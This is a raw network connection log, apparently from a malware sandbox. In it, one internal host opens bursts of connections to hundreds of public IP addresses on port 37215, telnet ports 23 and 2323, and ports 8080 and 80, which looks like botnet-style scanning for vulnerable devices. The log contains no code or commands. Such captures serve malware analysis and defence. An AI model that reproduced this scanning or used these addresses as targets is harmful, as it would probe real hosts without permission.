Nov 22, 2023 08:37:51.872895002 CET	53320	8080	192.168.2.23	31.43.30.38
Nov 22, 2023 08:37:51.874254942 CET	53330	8080	192.168.2.23	31.43.30.38
Nov 22, 2023 08:37:51.874972105 CET	8080	43820	94.121.181.0	192.168.2.23
Nov 22, 2023 08:37:51.874996901 CET	8080	54040	31.200.127.109	192.168.2.23
Nov 22, 2023 08:37:51.875045061 CET	43820	8080	192.168.2.23	94.121.181.0
Nov 22, 2023 08:37:51.875049114 CET	54040	8080	192.168.2.23	31.200.127.109
Nov 22, 2023 08:37:51.875068903 CET	54040	8080	192.168.2.23	31.200.127.109
Nov 22, 2023 08:37:51.875153065 CET	43820	8080	192.168.2.23	94.121.181.0
Nov 22, 2023 08:37:51.875171900 CET	43820	8080	192.168.2.23	94.121.181.0
Nov 22, 2023 08:37:51.875205994 CET	43830	8080	192.168.2.23	94.121.181.0
Nov 22, 2023 08:37:51.885055065 CET	8080	43116	94.121.79.125	192.168.2.23
Nov 22, 2023 08:37:51.885576963 CET	8080	43130	94.121.79.125	192.168.2.23
Nov 22, 2023 08:37:51.885647058 CET	43130	8080	192.168.2.23	94.121.79.125
Nov 22, 2023 08:37:51.885677099 CET	43130	8080	192.168.2.23	94.121.79.125
Nov 22, 2023 08:37:51.984056950 CET	8080	38780	31.136.130.132	192.168.2.23
Nov 22, 2023 08:37:51.984365940 CET	38780	8080	192.168.2.23	31.136.130.132
Nov 22, 2023 08:37:51.984365940 CET	38780	8080	192.168.2.23	31.136.130.132
Nov 22, 2023 08:37:52.055408001 CET	8080	54329	95.197.31.21	192.168.2.23
Nov 22, 2023 08:37:52.058701038 CET	80	54328	95.250.195.43	192.168.2.23
Nov 22, 2023 08:37:52.070450068 CET	80	54328	95.248.48.96	192.168.2.23
Nov 22, 2023 08:37:52.071825981 CET	80	54328	95.67.61.19	192.168.2.23
Nov 22, 2023 08:37:52.094208956 CET	8080	53320	31.43.30.38	192.168.2.23
Nov 22, 2023 08:37:52.095370054 CET	8080	53320	31.43.30.38	192.168.2.23
Nov 22, 2023 08:37:52.095387936 CET	8080	53320	31.43.30.38	192.168.2.23
Nov 22, 2023 08:37:52.095577002 CET	53320	8080	192.168.2.23	31.43.30.38
Nov 22, 2023 08:37:52.095577002 CET	53320	8080	192.168.2.23	31.43.30.38
Nov 22, 2023 08:37:52.097543955 CET	8080	43830	94.121.181.0	192.168.2.23
Nov 22, 2023 08:37:52.097640991 CET	43830	8080	192.168.2.23	94.121.181.0
Nov 22, 2023 08:37:52.097680092 CET	43830	8080	192.168.2.23	94.121.181.0
Nov 22, 2023 08:37:52.098640919 CET	8080	54040	31.200.127.109	192.168.2.23
Nov 22, 2023 08:37:52.098658085 CET	8080	43820	94.121.181.0	192.168.2.23
Nov 22, 2023 08:37:52.099591970 CET	8080	53330	31.43.30.38	192.168.2.23
Nov 22, 2023 08:37:52.099678993 CET	53330	8080	192.168.2.23	31.43.30.38
Nov 22, 2023 08:37:52.099678993 CET	53330	8080	192.168.2.23	31.43.30.38
Nov 22, 2023 08:37:52.112745047 CET	8080	43130	94.121.79.125	192.168.2.23
Nov 22, 2023 08:37:52.114428997 CET	80	54328	95.220.199.26	192.168.2.23
Nov 22, 2023 08:37:52.141354084 CET	80	54328	95.161.196.170	192.168.2.23
Nov 22, 2023 08:37:52.141557932 CET	54328	80	192.168.2.23	95.161.196.170
Nov 22, 2023 08:37:52.179794073 CET	51792	8080	192.168.2.23	94.238.153.128
Nov 22, 2023 08:37:52.211826086 CET	59444	8080	192.168.2.23	31.136.70.145
Nov 22, 2023 08:37:52.319964886 CET	8080	43830	94.121.181.0	192.168.2.23
Nov 22, 2023 08:37:52.322421074 CET	8080	54329	95.192.25.151	192.168.2.23
Nov 22, 2023 08:37:52.325824976 CET	8080	53330	31.43.30.38	192.168.2.23
Nov 22, 2023 08:37:52.326040030 CET	53330	8080	192.168.2.23	31.43.30.38
Nov 22, 2023 08:37:52.339721918 CET	51800	8080	192.168.2.23	94.238.153.128
Nov 22, 2023 08:37:52.371727943 CET	59454	8080	192.168.2.23	31.136.70.145
Nov 22, 2023 08:37:52.371752024 CET	38768	8080	192.168.2.23	31.136.130.132
Nov 22, 2023 08:37:52.410458088 CET	80	54328	95.251.239.21	192.168.2.23
Nov 22, 2023 08:37:52.437151909 CET	54335	37215	192.168.2.23	197.245.41.2
Nov 22, 2023 08:37:52.437160015 CET	54335	37215	192.168.2.23	197.55.92.209
Nov 22, 2023 08:37:52.437175989 CET	54335	37215	192.168.2.23	197.135.92.68
Nov 22, 2023 08:37:52.437195063 CET	54335	37215	192.168.2.23	197.6.42.110
Nov 22, 2023 08:37:52.437195063 CET	54335	37215	192.168.2.23	197.215.247.219
Nov 22, 2023 08:37:52.437195063 CET	54335	37215	192.168.2.23	197.57.4.151
Nov 22, 2023 08:37:52.437196970 CET	54335	37215	192.168.2.23	197.194.177.149
Nov 22, 2023 08:37:52.437195063 CET	54335	37215	192.168.2.23	197.51.192.171
Nov 22, 2023 08:37:52.437196970 CET	54335	37215	192.168.2.23	197.164.67.135
Nov 22, 2023 08:37:52.437205076 CET	54335	37215	192.168.2.23	197.67.223.132
Nov 22, 2023 08:37:52.437216997 CET	54335	37215	192.168.2.23	197.146.79.164
Nov 22, 2023 08:37:52.437237024 CET	54335	37215	192.168.2.23	197.15.203.71
Nov 22, 2023 08:37:52.437261105 CET	54335	37215	192.168.2.23	197.118.12.42
Nov 22, 2023 08:37:52.437300920 CET	54335	37215	192.168.2.23	197.250.222.199
Nov 22, 2023 08:37:52.437300920 CET	54335	37215	192.168.2.23	197.70.235.152
Nov 22, 2023 08:37:52.437352896 CET	54335	37215	192.168.2.23	197.147.231.27
Nov 22, 2023 08:37:52.437365055 CET	54335	37215	192.168.2.23	197.180.217.156
Nov 22, 2023 08:37:52.437417984 CET	54335	37215	192.168.2.23	197.5.196.36
Nov 22, 2023 08:37:52.437417984 CET	54335	37215	192.168.2.23	197.9.230.39
Nov 22, 2023 08:37:52.437422037 CET	54335	37215	192.168.2.23	197.202.89.98
Nov 22, 2023 08:37:52.437442064 CET	54335	37215	192.168.2.23	197.196.78.130
Nov 22, 2023 08:37:52.437453985 CET	54335	37215	192.168.2.23	197.156.223.217
Nov 22, 2023 08:37:52.437505960 CET	54335	37215	192.168.2.23	197.70.109.0
Nov 22, 2023 08:37:52.437510967 CET	54335	37215	192.168.2.23	197.108.54.43
Nov 22, 2023 08:37:52.437510967 CET	54335	37215	192.168.2.23	197.33.47.18
Nov 22, 2023 08:37:52.437571049 CET	54335	37215	192.168.2.23	197.67.87.239
Nov 22, 2023 08:37:52.437571049 CET	54335	37215	192.168.2.23	197.210.80.18
Nov 22, 2023 08:37:52.437612057 CET	54335	37215	192.168.2.23	197.77.211.213
Nov 22, 2023 08:37:52.437612057 CET	54335	37215	192.168.2.23	197.99.220.254
Nov 22, 2023 08:37:52.437618017 CET	54335	37215	192.168.2.23	197.163.64.201
Nov 22, 2023 08:37:52.437618017 CET	54335	37215	192.168.2.23	197.57.225.122
Nov 22, 2023 08:37:52.437661886 CET	54335	37215	192.168.2.23	197.169.122.142
Nov 22, 2023 08:37:52.437674046 CET	54335	37215	192.168.2.23	197.90.250.7
Nov 22, 2023 08:37:52.437721968 CET	54335	37215	192.168.2.23	197.95.154.103
Nov 22, 2023 08:37:52.437721968 CET	54335	37215	192.168.2.23	197.1.213.211
Nov 22, 2023 08:37:52.437764883 CET	54335	37215	192.168.2.23	197.46.186.173
Nov 22, 2023 08:37:52.437764883 CET	54335	37215	192.168.2.23	197.213.189.187
Nov 22, 2023 08:37:52.437764883 CET	54335	37215	192.168.2.23	197.13.167.67
Nov 22, 2023 08:37:52.437783957 CET	54335	37215	192.168.2.23	197.206.220.237
Nov 22, 2023 08:37:52.437833071 CET	54335	37215	192.168.2.23	197.3.199.44
Nov 22, 2023 08:37:52.437839031 CET	54335	37215	192.168.2.23	197.17.196.152
Nov 22, 2023 08:37:52.437860966 CET	54335	37215	192.168.2.23	197.220.40.214
Nov 22, 2023 08:37:52.437908888 CET	54335	37215	192.168.2.23	197.110.66.84
Nov 22, 2023 08:37:52.437908888 CET	54335	37215	192.168.2.23	197.238.32.161
Nov 22, 2023 08:37:52.437944889 CET	54335	37215	192.168.2.23	197.47.178.166
Nov 22, 2023 08:37:52.437952995 CET	54335	37215	192.168.2.23	197.51.83.220
Nov 22, 2023 08:37:52.437993050 CET	54335	37215	192.168.2.23	197.18.37.107
Nov 22, 2023 08:37:52.437995911 CET	54335	37215	192.168.2.23	197.45.168.247
Nov 22, 2023 08:37:52.438009977 CET	54335	37215	192.168.2.23	197.248.31.22
Nov 22, 2023 08:37:52.438028097 CET	54335	37215	192.168.2.23	197.109.201.249
Nov 22, 2023 08:37:52.438085079 CET	54335	37215	192.168.2.23	197.86.117.10
Nov 22, 2023 08:37:52.438088894 CET	54335	37215	192.168.2.23	197.14.164.33
Nov 22, 2023 08:37:52.438122034 CET	54335	37215	192.168.2.23	197.252.44.92
Nov 22, 2023 08:37:52.438122034 CET	54335	37215	192.168.2.23	197.119.204.239
Nov 22, 2023 08:37:52.438168049 CET	54335	37215	192.168.2.23	197.239.28.78
Nov 22, 2023 08:37:52.438220024 CET	54335	37215	192.168.2.23	197.251.97.101
Nov 22, 2023 08:37:52.438221931 CET	54335	37215	192.168.2.23	197.52.70.248
Nov 22, 2023 08:37:52.438271999 CET	54335	37215	192.168.2.23	197.184.122.224
Nov 22, 2023 08:37:52.438271999 CET	54335	37215	192.168.2.23	197.37.63.218
Nov 22, 2023 08:37:52.438272953 CET	54335	37215	192.168.2.23	197.148.78.123
Nov 22, 2023 08:37:52.438302040 CET	54335	37215	192.168.2.23	197.182.95.94
Nov 22, 2023 08:37:52.438349009 CET	54335	37215	192.168.2.23	197.128.148.160
Nov 22, 2023 08:37:52.438355923 CET	54335	37215	192.168.2.23	197.147.218.87
Nov 22, 2023 08:37:52.438375950 CET	54335	37215	192.168.2.23	197.71.251.87
Nov 22, 2023 08:37:52.438375950 CET	54335	37215	192.168.2.23	197.131.135.45
Nov 22, 2023 08:37:52.438400030 CET	54335	37215	192.168.2.23	197.80.140.207
Nov 22, 2023 08:37:52.438424110 CET	54335	37215	192.168.2.23	197.114.106.74
Nov 22, 2023 08:37:52.438424110 CET	54335	37215	192.168.2.23	197.80.204.117
Nov 22, 2023 08:37:52.438493013 CET	54335	37215	192.168.2.23	197.148.66.111
Nov 22, 2023 08:37:52.438493013 CET	54335	37215	192.168.2.23	197.233.237.253
Nov 22, 2023 08:37:52.438494921 CET	54335	37215	192.168.2.23	197.115.139.126
Nov 22, 2023 08:37:52.438513994 CET	54335	37215	192.168.2.23	197.155.155.6
Nov 22, 2023 08:37:52.438515902 CET	54335	37215	192.168.2.23	197.220.62.135
Nov 22, 2023 08:37:52.438549042 CET	54335	37215	192.168.2.23	197.252.213.239
Nov 22, 2023 08:37:52.438555002 CET	54335	37215	192.168.2.23	197.90.211.2
Nov 22, 2023 08:37:52.438606977 CET	54335	37215	192.168.2.23	197.180.99.74
Nov 22, 2023 08:37:52.438606977 CET	54335	37215	192.168.2.23	197.78.245.137
Nov 22, 2023 08:37:52.438702106 CET	54335	37215	192.168.2.23	197.223.121.83
Nov 22, 2023 08:37:52.438702106 CET	54335	37215	192.168.2.23	197.93.14.183
Nov 22, 2023 08:37:52.438703060 CET	54335	37215	192.168.2.23	197.34.210.125
Nov 22, 2023 08:37:52.438745022 CET	54335	37215	192.168.2.23	197.84.125.148
Nov 22, 2023 08:37:52.438745975 CET	54335	37215	192.168.2.23	197.81.7.123
Nov 22, 2023 08:37:52.438762903 CET	54335	37215	192.168.2.23	197.184.23.183
Nov 22, 2023 08:37:52.438762903 CET	54335	37215	192.168.2.23	197.46.120.30
Nov 22, 2023 08:37:52.438766003 CET	54335	37215	192.168.2.23	197.224.205.125
Nov 22, 2023 08:37:52.438802958 CET	54335	37215	192.168.2.23	197.179.134.17
Nov 22, 2023 08:37:52.438807964 CET	54335	37215	192.168.2.23	197.224.113.32
Nov 22, 2023 08:37:52.438812971 CET	54335	37215	192.168.2.23	197.74.149.98
Nov 22, 2023 08:37:52.438878059 CET	54335	37215	192.168.2.23	197.189.1.43
Nov 22, 2023 08:37:52.438886881 CET	54335	37215	192.168.2.23	197.194.156.122
Nov 22, 2023 08:37:52.438889027 CET	54335	37215	192.168.2.23	197.22.32.191
Nov 22, 2023 08:37:52.438918114 CET	54335	37215	192.168.2.23	197.138.132.248
Nov 22, 2023 08:37:52.438950062 CET	54335	37215	192.168.2.23	197.91.232.52
Nov 22, 2023 08:37:52.438962936 CET	54335	37215	192.168.2.23	197.16.204.234
Nov 22, 2023 08:37:52.439038038 CET	54335	37215	192.168.2.23	197.39.59.117
Nov 22, 2023 08:37:52.439038992 CET	54335	37215	192.168.2.23	197.121.113.162
Nov 22, 2023 08:37:52.439052105 CET	54335	37215	192.168.2.23	197.60.135.235
Nov 22, 2023 08:37:52.439054012 CET	54335	37215	192.168.2.23	197.97.223.79
Nov 22, 2023 08:37:52.439068079 CET	54335	37215	192.168.2.23	197.55.140.191
Nov 22, 2023 08:37:52.439106941 CET	54335	37215	192.168.2.23	197.187.205.20
Nov 22, 2023 08:37:52.439121962 CET	54335	37215	192.168.2.23	197.83.222.150
Nov 22, 2023 08:37:52.439140081 CET	54335	37215	192.168.2.23	197.238.169.0
Nov 22, 2023 08:37:52.439141035 CET	54335	37215	192.168.2.23	197.18.52.94
Nov 22, 2023 08:37:52.439168930 CET	54335	37215	192.168.2.23	197.227.192.6
Nov 22, 2023 08:37:52.439187050 CET	54335	37215	192.168.2.23	197.63.188.21
Nov 22, 2023 08:37:52.439227104 CET	54335	37215	192.168.2.23	197.134.47.181
Nov 22, 2023 08:37:52.439230919 CET	54335	37215	192.168.2.23	197.183.162.108
Nov 22, 2023 08:37:52.439244986 CET	54335	37215	192.168.2.23	197.128.12.80
Nov 22, 2023 08:37:52.439254999 CET	54335	37215	192.168.2.23	197.159.83.20
Nov 22, 2023 08:37:52.439275026 CET	54335	37215	192.168.2.23	197.229.80.95
Nov 22, 2023 08:37:52.439318895 CET	54335	37215	192.168.2.23	197.130.39.49
Nov 22, 2023 08:37:52.439335108 CET	54335	37215	192.168.2.23	197.132.120.38
Nov 22, 2023 08:37:52.439352989 CET	54335	37215	192.168.2.23	197.32.200.14
Nov 22, 2023 08:37:52.439418077 CET	54335	37215	192.168.2.23	197.122.31.147
Nov 22, 2023 08:37:52.439419985 CET	54335	37215	192.168.2.23	197.244.64.205
Nov 22, 2023 08:37:52.439435005 CET	54335	37215	192.168.2.23	197.185.181.123
Nov 22, 2023 08:37:52.439444065 CET	54335	37215	192.168.2.23	197.116.175.102
Nov 22, 2023 08:37:52.439466000 CET	54335	37215	192.168.2.23	197.191.127.238
Nov 22, 2023 08:37:52.439466953 CET	54335	37215	192.168.2.23	197.181.36.205
Nov 22, 2023 08:37:52.439502954 CET	54335	37215	192.168.2.23	197.133.207.237
Nov 22, 2023 08:37:52.439502954 CET	54335	37215	192.168.2.23	197.187.19.255
Nov 22, 2023 08:37:52.439516068 CET	54335	37215	192.168.2.23	197.178.78.96
Nov 22, 2023 08:37:52.439527035 CET	54335	37215	192.168.2.23	197.107.107.198
Nov 22, 2023 08:37:52.439538002 CET	54335	37215	192.168.2.23	197.252.67.10
Nov 22, 2023 08:37:52.439574957 CET	54335	37215	192.168.2.23	197.42.162.23
Nov 22, 2023 08:37:52.439574957 CET	54335	37215	192.168.2.23	197.196.221.122
Nov 22, 2023 08:37:52.439610004 CET	54335	37215	192.168.2.23	197.17.21.163
Nov 22, 2023 08:37:52.439619064 CET	54335	37215	192.168.2.23	197.207.148.32
Nov 22, 2023 08:37:52.439635038 CET	54335	37215	192.168.2.23	197.0.228.182
Nov 22, 2023 08:37:52.439654112 CET	54335	37215	192.168.2.23	197.204.170.72
Nov 22, 2023 08:37:52.439740896 CET	54335	37215	192.168.2.23	197.206.136.193
Nov 22, 2023 08:37:52.439759970 CET	54335	37215	192.168.2.23	197.0.55.141
Nov 22, 2023 08:37:52.439763069 CET	54335	37215	192.168.2.23	197.198.158.208
Nov 22, 2023 08:37:52.439778090 CET	54335	37215	192.168.2.23	197.200.179.40
Nov 22, 2023 08:37:52.439789057 CET	54335	37215	192.168.2.23	197.224.41.200
Nov 22, 2023 08:37:52.439794064 CET	54335	37215	192.168.2.23	197.152.186.49
Nov 22, 2023 08:37:52.439829111 CET	54335	37215	192.168.2.23	197.26.194.75
Nov 22, 2023 08:37:52.439878941 CET	54335	37215	192.168.2.23	197.30.22.24
Nov 22, 2023 08:37:52.439879894 CET	54335	37215	192.168.2.23	197.88.143.196
Nov 22, 2023 08:37:52.439881086 CET	54335	37215	192.168.2.23	197.168.46.12
Nov 22, 2023 08:37:52.439894915 CET	54335	37215	192.168.2.23	197.253.138.30
Nov 22, 2023 08:37:52.439912081 CET	54335	37215	192.168.2.23	197.54.5.10
Nov 22, 2023 08:37:52.439940929 CET	54335	37215	192.168.2.23	197.233.102.27
Nov 22, 2023 08:37:52.439985037 CET	54335	37215	192.168.2.23	197.188.199.204
Nov 22, 2023 08:37:52.440031052 CET	54335	37215	192.168.2.23	197.228.78.87
Nov 22, 2023 08:37:52.440032959 CET	54335	37215	192.168.2.23	197.134.161.177
Nov 22, 2023 08:37:52.440033913 CET	54335	37215	192.168.2.23	197.128.218.202
Nov 22, 2023 08:37:52.440043926 CET	54335	37215	192.168.2.23	197.128.129.49
Nov 22, 2023 08:37:52.440068007 CET	54335	37215	192.168.2.23	197.149.59.223
Nov 22, 2023 08:37:52.440088034 CET	54335	37215	192.168.2.23	197.245.103.142
Nov 22, 2023 08:37:52.440180063 CET	54335	37215	192.168.2.23	197.25.72.47
Nov 22, 2023 08:37:52.440181017 CET	54335	37215	192.168.2.23	197.141.1.68
Nov 22, 2023 08:37:52.440181971 CET	54335	37215	192.168.2.23	197.33.7.153
Nov 22, 2023 08:37:52.440193892 CET	54335	37215	192.168.2.23	197.148.68.189
Nov 22, 2023 08:37:52.440202951 CET	54335	37215	192.168.2.23	197.52.43.193
Nov 22, 2023 08:37:52.440226078 CET	54335	37215	192.168.2.23	197.226.30.173
Nov 22, 2023 08:37:52.440246105 CET	54335	37215	192.168.2.23	197.56.219.251
Nov 22, 2023 08:37:52.440260887 CET	54335	37215	192.168.2.23	197.237.18.187
Nov 22, 2023 08:37:52.440283060 CET	54335	37215	192.168.2.23	197.4.88.130
Nov 22, 2023 08:37:52.440428019 CET	54335	37215	192.168.2.23	197.98.220.152
Nov 22, 2023 08:37:52.444545984 CET	54320	2323	192.168.2.23	112.227.213.66
Nov 22, 2023 08:37:52.444545984 CET	54320	23	192.168.2.23	23.53.93.58
Nov 22, 2023 08:37:52.444549084 CET	54320	23	192.168.2.23	90.178.55.194
Nov 22, 2023 08:37:52.444555044 CET	54320	23	192.168.2.23	103.201.186.4
Nov 22, 2023 08:37:52.444560051 CET	54320	23	192.168.2.23	95.156.46.244
Nov 22, 2023 08:37:52.444574118 CET	54320	23	192.168.2.23	66.133.251.20
Nov 22, 2023 08:37:52.444577932 CET	54320	23	192.168.2.23	211.14.58.189
Nov 22, 2023 08:37:52.444577932 CET	54320	23	192.168.2.23	168.159.17.119
Nov 22, 2023 08:37:52.444591045 CET	54320	23	192.168.2.23	36.185.196.146
Nov 22, 2023 08:37:52.444601059 CET	54320	23	192.168.2.23	195.197.70.144
Nov 22, 2023 08:37:52.444683075 CET	54320	23	192.168.2.23	18.163.213.76
Nov 22, 2023 08:37:52.444683075 CET	54320	2323	192.168.2.23	43.181.78.56
Nov 22, 2023 08:37:52.444684982 CET	54320	23	192.168.2.23	169.250.248.44
Nov 22, 2023 08:37:52.444685936 CET	54320	2323	192.168.2.23	93.68.66.23
Nov 22, 2023 08:37:52.444685936 CET	54320	23	192.168.2.23	19.153.246.244
Nov 22, 2023 08:37:52.444686890 CET	54320	23	192.168.2.23	171.87.180.210
Nov 22, 2023 08:37:52.444685936 CET	54320	23	192.168.2.23	148.91.28.8
Nov 22, 2023 08:37:52.444686890 CET	54320	23	192.168.2.23	20.90.215.240
Nov 22, 2023 08:37:52.444684982 CET	54320	23	192.168.2.23	179.7.10.127
Nov 22, 2023 08:37:52.444686890 CET	54320	23	192.168.2.23	114.73.27.160
Nov 22, 2023 08:37:52.444686890 CET	54320	23	192.168.2.23	178.131.250.43
Nov 22, 2023 08:37:52.444700003 CET	54320	23	192.168.2.23	180.148.174.28
Nov 22, 2023 08:37:52.444700003 CET	54320	23	192.168.2.23	128.167.245.97
Nov 22, 2023 08:37:52.444703102 CET	54320	23	192.168.2.23	37.220.156.115
Nov 22, 2023 08:37:52.444705009 CET	54320	2323	192.168.2.23	60.73.81.137
Nov 22, 2023 08:37:52.444709063 CET	54320	23	192.168.2.23	202.18.120.97
Nov 22, 2023 08:37:52.444709063 CET	54320	23	192.168.2.23	209.132.203.180
Nov 22, 2023 08:37:52.444710016 CET	54320	23	192.168.2.23	32.27.45.249
Nov 22, 2023 08:37:52.444710016 CET	54320	23	192.168.2.23	192.82.36.193
Nov 22, 2023 08:37:52.444721937 CET	54320	23	192.168.2.23	118.241.245.121
Nov 22, 2023 08:37:52.444725037 CET	54320	23	192.168.2.23	46.62.251.223
Nov 22, 2023 08:37:52.444725037 CET	54320	23	192.168.2.23	203.45.22.227
Nov 22, 2023 08:37:52.444725037 CET	54320	23	192.168.2.23	80.184.128.51
Nov 22, 2023 08:37:52.444727898 CET	54320	23	192.168.2.23	188.4.135.215
Nov 22, 2023 08:37:52.444729090 CET	54320	23	192.168.2.23	163.227.163.13
Nov 22, 2023 08:37:52.444729090 CET	54320	23	192.168.2.23	193.124.42.13
Nov 22, 2023 08:37:52.444729090 CET	54320	23	192.168.2.23	45.238.238.49
Nov 22, 2023 08:37:52.444734097 CET	54320	23	192.168.2.23	92.215.128.127
Nov 22, 2023 08:37:52.444737911 CET	54320	23	192.168.2.23	45.232.57.65
Nov 22, 2023 08:37:52.444739103 CET	54320	2323	192.168.2.23	133.209.171.205
Nov 22, 2023 08:37:52.444740057 CET	54320	23	192.168.2.23	138.144.235.83
Nov 22, 2023 08:37:52.444756031 CET	54320	23	192.168.2.23	34.52.87.205
Nov 22, 2023 08:37:52.444756031 CET	54320	23	192.168.2.23	109.249.144.244
Nov 22, 2023 08:37:52.444830894 CET	54320	23	192.168.2.23	202.62.241.248
Nov 22, 2023 08:37:52.444830894 CET	54320	23	192.168.2.23	154.207.30.128
Nov 22, 2023 08:37:52.444833040 CET	54320	23	192.168.2.23	123.69.22.227
Nov 22, 2023 08:37:52.444833040 CET	54320	23	192.168.2.23	166.46.28.78
Nov 22, 2023 08:37:52.444833994 CET	54320	23	192.168.2.23	53.89.105.80
Nov 22, 2023 08:37:52.444833040 CET	54320	23	192.168.2.23	38.177.86.186
Nov 22, 2023 08:37:52.444833994 CET	54320	23	192.168.2.23	133.167.208.122
Nov 22, 2023 08:37:52.444833994 CET	54320	23	192.168.2.23	185.46.125.49
Nov 22, 2023 08:37:52.444833994 CET	54320	23	192.168.2.23	78.212.252.120
Nov 22, 2023 08:37:52.444837093 CET	54320	2323	192.168.2.23	181.6.141.194
Nov 22, 2023 08:37:52.444837093 CET	54320	23	192.168.2.23	91.179.3.170
Nov 22, 2023 08:37:52.444837093 CET	54320	23	192.168.2.23	209.150.236.28
Nov 22, 2023 08:37:52.444847107 CET	54320	23	192.168.2.23	97.160.71.245
Nov 22, 2023 08:37:52.444853067 CET	54320	23	192.168.2.23	88.149.123.83
Nov 22, 2023 08:37:52.444859028 CET	54320	2323	192.168.2.23	75.162.24.15
Nov 22, 2023 08:37:52.444859028 CET	54320	23	192.168.2.23	138.12.93.88
Nov 22, 2023 08:37:52.444864035 CET	54320	23	192.168.2.23	196.218.20.143
Nov 22, 2023 08:37:52.444864988 CET	54320	23	192.168.2.23	164.127.137.185
Nov 22, 2023 08:37:52.444866896 CET	54320	23	192.168.2.23	150.11.76.149
Nov 22, 2023 08:37:52.444866896 CET	54320	23	192.168.2.23	102.0.13.215
Nov 22, 2023 08:37:52.444866896 CET	54320	23	192.168.2.23	18.207.11.130
Nov 22, 2023 08:37:52.444866896 CET	54320	23	192.168.2.23	59.222.203.212
Nov 22, 2023 08:37:52.444866896 CET	54320	23	192.168.2.23	9.138.18.172
Nov 22, 2023 08:37:52.444871902 CET	54320	2323	192.168.2.23	114.126.30.4
Nov 22, 2023 08:37:52.444880009 CET	54320	23	192.168.2.23	157.10.174.85
Nov 22, 2023 08:37:52.444880009 CET	54320	23	192.168.2.23	99.134.224.15
Nov 22, 2023 08:37:52.444880009 CET	54320	23	192.168.2.23	223.51.61.80
Nov 22, 2023 08:37:52.444880009 CET	54320	23	192.168.2.23	98.104.192.246
Nov 22, 2023 08:37:52.444885015 CET	54320	23	192.168.2.23	186.242.206.64
Nov 22, 2023 08:37:52.444888115 CET	54320	23	192.168.2.23	53.250.226.219
Nov 22, 2023 08:37:52.444897890 CET	54320	23	192.168.2.23	32.199.40.93
Nov 22, 2023 08:37:52.444915056 CET	54320	23	192.168.2.23	120.184.218.129
Nov 22, 2023 08:37:52.444915056 CET	54320	23	192.168.2.23	174.143.68.213
Nov 22, 2023 08:37:52.444921017 CET	54320	23	192.168.2.23	101.74.202.226
Nov 22, 2023 08:37:52.444926977 CET	54320	23	192.168.2.23	106.145.244.175
Nov 22, 2023 08:37:52.444930077 CET	54320	23	192.168.2.23	177.132.56.144
Nov 22, 2023 08:37:52.444931984 CET	54320	23	192.168.2.23	92.89.76.140
Nov 22, 2023 08:37:52.444948912 CET	54320	2323	192.168.2.23	223.211.6.11
Nov 22, 2023 08:37:52.444948912 CET	54320	23	192.168.2.23	182.100.110.152
Nov 22, 2023 08:37:52.444948912 CET	54320	23	192.168.2.23	116.30.247.87
Nov 22, 2023 08:37:52.445028067 CET	54320	23	192.168.2.23	208.239.249.232
Nov 22, 2023 08:37:52.445030928 CET	54320	23	192.168.2.23	1.69.104.130
Nov 22, 2023 08:37:52.445030928 CET	54320	23	192.168.2.23	60.67.202.233
Nov 22, 2023 08:37:52.445031881 CET	54320	23	192.168.2.23	79.41.94.7
Nov 22, 2023 08:37:52.445030928 CET	54320	23	192.168.2.23	153.131.86.65
Nov 22, 2023 08:37:52.445034981 CET	54320	23	192.168.2.23	213.238.185.248
Nov 22, 2023 08:37:52.445034981 CET	54320	23	192.168.2.23	164.225.128.185
Nov 22, 2023 08:37:52.445031881 CET	54320	23	192.168.2.23	114.201.246.102
Nov 22, 2023 08:37:52.445050955 CET	54320	23	192.168.2.23	140.236.17.2
Nov 22, 2023 08:37:52.445050955 CET	54320	23	192.168.2.23	176.142.193.71
Nov 22, 2023 08:37:52.445053101 CET	54320	23	192.168.2.23	63.229.66.112
Nov 22, 2023 08:37:52.445053101 CET	54320	23	192.168.2.23	207.212.170.244
Nov 22, 2023 08:37:52.445053101 CET	54320	23	192.168.2.23	107.34.29.76
Nov 22, 2023 08:37:52.445055008 CET	54320	23	192.168.2.23	17.56.167.27
Nov 22, 2023 08:37:52.445055008 CET	54320	23	192.168.2.23	54.9.90.22
Nov 22, 2023 08:37:52.445055008 CET	54320	23	192.168.2.23	40.242.153.15
Nov 22, 2023 08:37:52.445055008 CET	54320	2323	192.168.2.23	206.241.168.98
Nov 22, 2023 08:37:52.445060015 CET	54320	23	192.168.2.23	161.218.46.115
Nov 22, 2023 08:37:52.445060015 CET	54320	23	192.168.2.23	196.190.10.83
Nov 22, 2023 08:37:52.445069075 CET	54320	23	192.168.2.23	172.155.67.176
Nov 22, 2023 08:37:52.445069075 CET	54320	23	192.168.2.23	8.167.113.11
Nov 22, 2023 08:37:52.445069075 CET	54320	23	192.168.2.23	77.161.44.27
Nov 22, 2023 08:37:52.445069075 CET	54320	23	192.168.2.23	1.81.232.74
Nov 22, 2023 08:37:52.445072889 CET	54320	2323	192.168.2.23	65.238.196.194
Nov 22, 2023 08:37:52.445072889 CET	54320	23	192.168.2.23	172.1.159.13
Nov 22, 2023 08:37:52.445072889 CET	54320	23	192.168.2.23	205.177.66.215
Nov 22, 2023 08:37:52.445084095 CET	54320	23	192.168.2.23	57.74.139.251
Nov 22, 2023 08:37:52.445084095 CET	54320	23	192.168.2.23	50.193.69.218
Nov 22, 2023 08:37:52.445084095 CET	54320	23	192.168.2.23	72.120.169.147
Nov 22, 2023 08:37:52.445089102 CET	54320	2323	192.168.2.23	140.7.133.15
Nov 22, 2023 08:37:52.445091009 CET	54320	23	192.168.2.23	195.27.23.232
Nov 22, 2023 08:37:52.445095062 CET	54320	23	192.168.2.23	57.103.27.57
Nov 22, 2023 08:37:52.445106983 CET	54320	23	192.168.2.23	118.137.231.209
Nov 22, 2023 08:37:52.445107937 CET	54320	23	192.168.2.23	86.150.0.55
Nov 22, 2023 08:37:52.445117950 CET	54320	23	192.168.2.23	98.176.177.204
Nov 22, 2023 08:37:52.445122004 CET	54320	23	192.168.2.23	117.190.72.5
Nov 22, 2023 08:37:52.445126057 CET	54320	23	192.168.2.23	138.6.179.155
Nov 22, 2023 08:37:52.445136070 CET	54320	2323	192.168.2.23	207.7.129.249
Nov 22, 2023 08:37:52.445141077 CET	54320	23	192.168.2.23	38.171.81.5
Nov 22, 2023 08:37:52.445142031 CET	54320	23	192.168.2.23	139.180.13.106
Nov 22, 2023 08:37:52.445223093 CET	54320	23	192.168.2.23	217.76.36.79
Nov 22, 2023 08:37:52.445224047 CET	54320	23	192.168.2.23	156.112.61.34
Nov 22, 2023 08:37:52.445255041 CET	54320	23	192.168.2.23	180.104.26.49
Nov 22, 2023 08:37:52.445257902 CET	54320	23	192.168.2.23	122.194.195.12
Nov 22, 2023 08:37:52.445257902 CET	54320	23	192.168.2.23	36.43.11.157
